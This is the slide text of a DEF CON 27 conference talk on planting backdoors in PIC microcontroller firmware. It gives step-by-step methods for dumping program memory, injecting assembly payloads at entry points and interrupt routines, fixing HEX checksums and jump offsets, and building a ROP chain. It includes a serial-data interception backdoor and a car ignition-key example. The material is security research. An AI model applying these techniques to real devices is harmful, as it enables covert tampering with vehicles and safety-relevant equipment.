DEF CON 27- SHEILA A BERTA - backdooring hardware devices by injecting malicious payloads on microcontrollers
0 likes47 views
The document discusses techniques for backdooring hardware devices, specifically by injecting malicious payloads into microcontrollers. It explains the differences between microprocessors and microcontrollers, outlines programming and payload generation processes, and demonstrates payload injection methods, including checksum recalibration and fixing instruction flow. The content also covers practical applications and examples of injecting payloads to hijack functionality in various devices.
DEF CON 27- SHEILA A BERTA - backdooring hardware devices by injecting malicious payloads on microcontrollers
- 1. Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)
- 2. @UnaPibaGeek WHO AM I?_ Sheila A. Berta (@UnaPibaGeek) Offensive Security Researcher
- 3. @UnaPibaGeek WHO AM I?_ Sheila A. Berta (@UnaPibaGeek) Offensive Security Researcher A little bit more: - Developer in ASM (Microcontrollers & Microprocessors x86/x64), C/C++, Python and Go. - Speaker at Black Hat (x2), DEF CON (x2), Ekoparty (x4), HITB, PhDays, IEEE… & more.
- 4. @UnaPibaGeek
- 5. @UnaPibaGeek
- 6. @UnaPibaGeek MICROCONTROLLERS VS MICROPROCESSORS_ Microprocessors Intel, AMD, ARM … Microcontrollers Microchip, ATMEL, ST …
- 7. @UnaPibaGeek MICROPROCESSORS OVERVIEW_ • Microprocessors = CPU • Memories and I/O busses are physically separated. • Usually bigger than a microcontroller. • Greater processing capacity. • Modified-Harvard memory organization. • 32 or 64 bits (most common).
- 8. @UnaPibaGeek MICROCONTROLLERS OVERVIEW_ • Microcontrollers = CPU + RAM + ROM + I/O busses • Smaller CPU with less processing capacity. • Usually smaller size than microprocessors. • Harvard memory organization. • 16 bits (most common). • A little stack.
- 9. @UnaPibaGeek USE CASES_ != Raspberry PI ARM Microprocessor Arduino UNO Atmega Microcontroller
- 14. @UnaPibaGeek IS WORTH IT?_ • Physical Security Systems. • Car’s ECU. • Semaphores. • Elevators. • Sensors. • Modules of Industrial systems. • Home appliances. • Robots. • …
- 17. @UnaPibaGeek MICROCONTROLLERS PROGRAMMING_ ASM code to turning on a LED - (PIC)
- 18. @UnaPibaGeek MICROCONTROLLERS PROGRAMMING_ ASM code to turning on a LED - (PIC) MPLAB X IDE
- 19. @UnaPibaGeek MICROCONTROLLERS PROGRAMMING_ ASM code to turning on a LED - (PIC) MPLAB X IDE .hex file (firmware)
- 20. @UnaPibaGeek MICROCONTROLLERS PROGRAMMING_ Microchip (PIC) programmer software Microchip (PIC) programmer hardware
- 22. @UnaPibaGeek PIC MEMORY ORGANIZATION_ non-volatile non-volatilevolatile
- 23. @UnaPibaGeek PROGRAM MEMORY DUMP (STEP 1)_ Connection from PIC microcontroller to PICKIT 3
- 24. @UnaPibaGeek PROGRAM MEMORY DUMP (STEP 2)_ Using MPLAB X IDE to read (and dump) the program memory 1
- 25. @UnaPibaGeek PROGRAM MEMORY DUMP (STEP 2)_ Using MPLAB X IDE to read (and dump) the program memory 1 2
- 26. @UnaPibaGeek PROGRAM MEMORY DUMP (STEP 2)_ Using MPLAB X IDE to read (and dump) the program memory 1 2 3
- 27. @UnaPibaGeek PROGRAM MEMORY DUMP (STEP 2)_ Using MPLAB X IDE to read (and dump) the program memory 1 2 3 4
- 28. @UnaPibaGeek PROGRAM MEMORY DUMP (STEP 3)_ Load the .hex file in the MPLAB X IDE
- 29. @UnaPibaGeek PROGRAM MEMORY DUMP (STEP 3)_ Load the .hex file in the MPLAB X IDE
- 30. @UnaPibaGeek CODE VS DISASSEMBLY (EXAMPLE)_ ASM source code Disassembly
- 31. @UnaPibaGeek CODE VS DISASSEMBLY (EXAMPLE)_ OpCodes in the .hex dump ASM source code Disassembly
- 32. @UnaPibaGeek PAYLOAD INJECTION: AT THE ENTRY POINT_
- 33. @UnaPibaGeek PROGRAM STANDARD STRUCTURE (PIC)_ Reset Vector: always at 0x0000 memory address Interrupt Vector: at 0x0008 and 0x0018 memory addresses Program entry point
- 34. @UnaPibaGeek LOCATING THE ENTRY POINT_
- 35. @UnaPibaGeek LOCATING THE ENTRY POINT_ Entry point Simple program example
- 36. @UnaPibaGeek LOCATING THE ENTRY POINT_ Entry point Simple program example Large program example
- 37. @UnaPibaGeek LOCATING THE ENTRY POINT_ Entry point Simple program example Large program example Example 1 -- Entry point: 0x06 Example 2 -- Entry point: 0x7F84 Memory address to inject Memory address to inject
- 38. @UnaPibaGeek GENERATING THE PAYLOAD #1 (PoC)_ BCF TRISD,1 // Set PIN as output BSF PORTD,1 // Turn ON a LED BCF TRISD,2 // Set PIN as output BSF PORTD,2 // Turn ON a LED
- 39. @UnaPibaGeek GENERATING THE PAYLOAD #1 (PoC)_ BCF TRISD,1 // Set PIN as output BSF PORTD,1 // Turn ON a LED BCF TRISD,2 // Set PIN as output BSF PORTD,2 // Turn ON a LED
- 40. @UnaPibaGeek GENERATING THE PAYLOAD #1 (PoC)_ BCF TRISD,1 // Set PIN as output BSF PORTD,1 // Turn ON a LED BCF TRISD,2 // Set PIN as output BSF PORTD,2 // Turn ON a LED 0x9295 = BCF TRISD,1 0x8283 = BSF PORTD,1 0x9495 = BCF TRISD,2 0x8483 = BSF PORTD,2
- 41. @UnaPibaGeek GENERATING THE PAYLOAD #1 (PoC)_ BCF TRISD,1 // Set PIN as output BSF PORTD,1 // Turn ON a LED BCF TRISD,2 // Set PIN as output BSF PORTD,2 // Turn ON a LED 0x9295 = BCF TRISD,1 0x8283 = BSF PORTD,1 0x9495 = BCF TRISD,2 0x8483 = BSF PORTD,2 Little Endian: 0x9592 0x8382 0x9594 0x8384
- 42. @UnaPibaGeek INJECTING THE PAYLOAD_ Entry point at 0x28 Original program memory (.hex dump)
- 43. @UnaPibaGeek INJECTING THE PAYLOAD_ Entry point at 0x28 Original program memory (.hex dump)
- 44. @UnaPibaGeek INJECTING THE PAYLOAD_ Entry point at 0x28 Original program memory (.hex dump) Entry point offset
- 45. @UnaPibaGeek INJECTING THE PAYLOAD_ Entry point at 0x28 Original program memory (.hex dump) Entry point offset Checksum
- 46. @UnaPibaGeek INJECTING THE PAYLOAD_ Entry point at 0x28 Original program memory (.hex dump) Entry point offset Checksum Payload injected at entry point (0x28)
- 47. @UnaPibaGeek CHECKSUM RECALCULATION_ Sum(bytes on the line) = Not +1 = checksum
- 48. @UnaPibaGeek CHECKSUM RECALCULATION_ Sum(bytes on the line) = Not +1 = checksum Example: :1000000003EF00F00000959E838E836A000E956E
- 49. @UnaPibaGeek CHECKSUM RECALCULATION_ Sum(bytes on the line) = Not +1 = checksum Example: 10+00+00+00+03+EF+00+F0+00+00+95+9E+83+8E+83+6A+00+0E+95+6E = 0x634 Not(0x634) +1 = 0xFFFF 0xFFFF 0xFFFF 0xF9CC Checksum = 0xCC :1000000003EF00F00000959E838E836A000E956E
- 50. @UnaPibaGeek CHECKSUM RECALCULATION_ https://www.fischl.de/hex_checksum_calculator/
- 51. @UnaPibaGeek CHECKSUM RECALCULATION_ https://www.fischl.de/hex_checksum_calculator/ Payload injected and checksum fixed
- 52. @UnaPibaGeek WRITE THE PROGRAM MEMORY_
- 53. @UnaPibaGeek BEFORE / AFTER (PoC)_ Original
- 54. @UnaPibaGeek BEFORE / AFTER (PoC)_ Original Payload injected
- 55. @UnaPibaGeek INJECTING TO A CAR’S ECU_ IGNITION KEY
- 56. @UnaPibaGeek INJECTING TO A CAR’S ECU_ IGNITION KEY Entry point: 0x152A
- 57. @UnaPibaGeek INJECTING TO A CAR’S ECU_ IGNITION KEY Entry point: 0x152A
- 58. @UnaPibaGeek ADVANCED PAYLOAD INJECTION: AT THE INTERRUPT VECTOR_
- 59. @UnaPibaGeek PERIPHERALS AND INTERRUPTIONS_ • Internal timers • A/D converters • CCP (Capture/Compare/PWM) • TX/RX busses • Others
- 60. @UnaPibaGeek PERIPHERALS AND INTERRUPTIONS_ • Internal timers • A/D converters • CCP (Capture/Compare/PWM) • TX/RX busses • Others
- 61. @UnaPibaGeek GIE AND PEIE BITS_
- 62. @UnaPibaGeek GIE AND PEIE BITS_ BSF INTCON, GIE // Set GIE to 1 BSF INTCON, PEIE // Set PEIE to 1
- 63. @UnaPibaGeek GIE AND PEIE BITS_ BSF INTCON, GIE // Set GIE to 1 BSF INTCON, PEIE // Set PEIE to 1 Interruptions enabled
- 65. @UnaPibaGeek INTERRUPTION FLAGS_ Timer0 Interruption Enabled Timer0 Interruption Flag XXIE = Interruption Enabled XXIF = Interruption Flag
- 66. @UnaPibaGeek INTERRUPTION FLAGS_ Timer0 Interruption Enabled Timer0 Interruption Flag XXIE = Interruption Enabled XXIF = Interruption Flag Registers PIE1, PIE2 and PIE3 have interruption enabling bits Registers PIR1, PIR2 and PIR3 have interruption flags bits
- 70. @UnaPibaGeek POLLING INSPECTION_ PIR1, 5 PIR1, 5 = PIR1, RCIF
- 71. @UnaPibaGeek POLLING INSPECTION_ PIR1, 5 PIR1, 5 = PIR1, RCIF Call to RC interruption routine
- 72. @UnaPibaGeek MEMORY ADDRESSES TO INJECT A PAYLOAD_ 0x48 to inject a payload at the RC interruption 0x4E to inject a payload at Timer0 interruption 0x56 to inject a payload at the AD interruption 0x5E to inject a payload at the INT0 interruption
- 73. @UnaPibaGeek BACKDOORING THE EUSART COMMUNICATION PERIPHERAL_ Step 1: locate where the RC interruption routine begins (by inspecting the polling) Call to RC interruption routine
- 74. @UnaPibaGeek BACKDOORING THE EUSART COMMUNICATION PERIPHERAL_ Step 1: locate where the RC interruption routine begins (by inspecting the polling) Call to RC interruption routine 0x48 RC interruption routine begins
- 75. @UnaPibaGeek BACKDOORING THE EUSART COMMUNICATION PERIPHERAL_ Step 2: Cook a payload that makes a relaying of the received data to a TX peripheral which we are able to monitor externally (example) MOVF RCREG, W // Move the received data to “W” register BSF TXSTA, TXEN // Enable transmission BCF TXSTA, SYNC // Set asynchronous operation BSF RCSTA, SPEN // Set TX/CK pin as an output MOVWF TXREG // Move received data (in W) to TXREG to be re-transmitted
- 76. @UnaPibaGeek BACKDOORING THE EUSART COMMUNICATION PERIPHERAL_ Step 2: Cook a payload that makes a relaying of the received data to a TX peripheral which we are able to monitor externally (example) MOVF RCREG, W // Move the received data to “W” register BSF TXSTA, TXEN // Enable transmission BCF TXSTA, SYNC // Set asynchronous operation BSF RCSTA, SPEN // Set TX/CK pin as an output MOVWF TXREG // Move received data (in W) to TXREG to be re-transmitted 0xAE50 0xAC8A 0xAC98 0xAB8E 0xAD6E
- 77. @UnaPibaGeek BACKDOORING THE EUSART COMMUNICATION PERIPHERAL_ Step 3: lnject the payload where the RC interruption routine begins 0x48 RC interruption routine begins Backdoor
- 78. @UnaPibaGeek BACKDOORING THE EUSART COMMUNICATION PERIPHERAL_ Step 3: lnject the payload where the RC interruption routine begins 0x48 RC interruption routine begins Backdoor
- 79. @UnaPibaGeek FIXING JUMPS: FLOW CORRUPTION_ Original program Program after payload injection
- 80. @UnaPibaGeek FIXING JUMPS: GOTO AND CALL OPCODES_ GOTO opcode = 0xEF CALL opcode = 0xEC NOP opcode = 0xF0
- 81. @UnaPibaGeek FIXING JUMPS: GOTO AND CALL OPCODES_ GOTO opcode = 0xEF CALL opcode = 0xEC NOP opcode = 0xF0 EF06 F000 = GOTO jumping to 0x0006 offset (0x000C memory address). EC67 F004 = CALL jumping to 0x0467 offset (0x08CE memory address).
- 82. @UnaPibaGeek FIXING JUMPS: GOTO AND CALL OPCODES_ GOTO opcode = 0xEF CALL opcode = 0xEC NOP opcode = 0xF0 EF06 F000 = GOTO jumping to 0x0006 offset (0x000C memory address). EC67 F004 = CALL jumping to 0x0467 offset (0x08CE memory address). Jump to 0x8CE (memory address) / 2 = 0x0467 offset
- 83. @UnaPibaGeek FIXING JUMPS: RECALCULATION_ Payload injected at memory address: 0x48 Payload length: 10 bytes
- 84. @UnaPibaGeek FIXING JUMPS: RECALCULATION_ Payload injected at memory address: 0x48 Payload length: 10 bytes Example: CALL 0x56 (EC2B F000) CALL 0x60 (EC30 F000) Fixed jump Original offset + payload length Original jump
- 85. @UnaPibaGeek FIXING JUMPS: RECALCULATION_ Payload injected at memory address: 0x48 Payload length: 10 bytes Example: CALL 0x56 (EC2B F000) CALL 0x60 (EC30 F000) Fixed jump Original offset + payload length Original jump Three CALL fixed after injection
- 88. @UnaPibaGeek STKPTR, TOSU, TOSH AND TOSL_ STKPTR = Stack Pointer register TOSU, TOSH and TOSL = Top of Stack registers
- 89. @UnaPibaGeek PROGRAM FLOW CONTROL_ INCF STKPTR,F // SP increment MOVLW 0x00 MOVWF TOSU // TOSU = 0x00 MOVLW 0x0C MOVWF TOSH // TOSH = 0x0C MOVLW 0x72 MOVWF TOSL // TOSL = 0x72 RETURN Jump to 0x000C72
- 90. @UnaPibaGeek PROGRAM FLOW CONTROL_ INCF STKPTR,F // SP increment MOVLW 0x00 MOVWF TOSU // TOSU = 0x00 MOVLW 0x0C MOVWF TOSH // TOSH = 0x0C MOVLW 0x72 MOVWF TOSL // TOSL = 0x72 RETURN Jump to 0x000C72 SP Increment TOS = 0x000024 Jump to 0x000024
- 91. @UnaPibaGeek PROGRAM FLOW CONTROL_ INCF STKPTR,F // SP increment MOVLW 0x00 MOVWF TOSU // TOSU = 0x00 MOVLW 0x0C MOVWF TOSH // TOSH = 0x0C MOVLW 0x72 MOVWF TOSL // TOSL = 0x72 RETURN Jump to 0x000C72 SP Increment TOS = 0x000024 Jump to 0x000024
- 92. @UnaPibaGeek PROGRAM FLOW CONTROL_ INCF STKPTR,F // SP increment MOVLW 0x00 MOVWF TOSU // TOSU = 0x00 MOVLW 0x0C MOVWF TOSH // TOSH = 0x0C MOVLW 0x72 MOVWF TOSL // TOSL = 0x72 RETURN Jump to 0x000C72 SP Increment TOS = 0x000024 Jump to 0x000024
- 93. @UnaPibaGeek ROP-CHAIN_ ROP gadgets: 0x0060 = 0xFC2A000EFF6E000EFE6E600EFD6E 0x0058 = 0xFC2A000EFF6E000EFE6E580EFD6E 0x0050 = 0xFC2A000EFF6E000EFE6E500EFD6E 0x0048 = 0xFC2A000EFF6E000EFE6E480EFD6E 0x0040 = 0xFC2A000EFF6E000EFE6E400EFD6E 0x0038 = 0xFC2A000EFF6E000EFE6E380EFD6E 0x0030 = 0xFC2A000EFF6E000EFE6E300EFD6E 0x0028 = 0xFC2A000EFF6E000EFE6E280EFD6E RET = 0x1200 (last) (first)
- 94. @UnaPibaGeek ROP-CHAIN_ ROP gadgets: 0x0060 = 0xFC2A000EFF6E000EFE6E600EFD6E 0x0058 = 0xFC2A000EFF6E000EFE6E580EFD6E 0x0050 = 0xFC2A000EFF6E000EFE6E500EFD6E 0x0048 = 0xFC2A000EFF6E000EFE6E480EFD6E 0x0040 = 0xFC2A000EFF6E000EFE6E400EFD6E 0x0038 = 0xFC2A000EFF6E000EFE6E380EFD6E 0x0030 = 0xFC2A000EFF6E000EFE6E300EFD6E 0x0028 = 0xFC2A000EFF6E000EFE6E280EFD6E RET = 0x1200 (last) (first) Gadget example at 0x0040: RETURN or RETLW
- 95. @UnaPibaGeek ROP-CHAIN_ ROP gadgets: 0x0060 = 0xFC2A000EFF6E000EFE6E600EFD6E 0x0058 = 0xFC2A000EFF6E000EFE6E580EFD6E 0x0050 = 0xFC2A000EFF6E000EFE6E500EFD6E 0x0048 = 0xFC2A000EFF6E000EFE6E480EFD6E 0x0040 = 0xFC2A000EFF6E000EFE6E400EFD6E 0x0038 = 0xFC2A000EFF6E000EFE6E380EFD6E 0x0030 = 0xFC2A000EFF6E000EFE6E300EFD6E 0x0028 = 0xFC2A000EFF6E000EFE6E280EFD6E RET = 0x1200 (last) (first) Gadget example at 0x0040: RETURN or RETLW
- 97. @UnaPibaGeek CODE PROTECTION_ Microchip Config Directives Program memory dump still works
- 98. @UnaPibaGeek BOOT AND DATA PROTECTION_ Microchip Config Directives Program memory dump doesn’t work
- 100. @UnaPibaGeek SPECIAL THANKS_ Sol (@encodedwitch) Nico Waisman (@nicowaisman) Dreamlab Technologies
- 101. THANK YOU_ SHEILA A. BERTA (@UNAPIBAGEEK)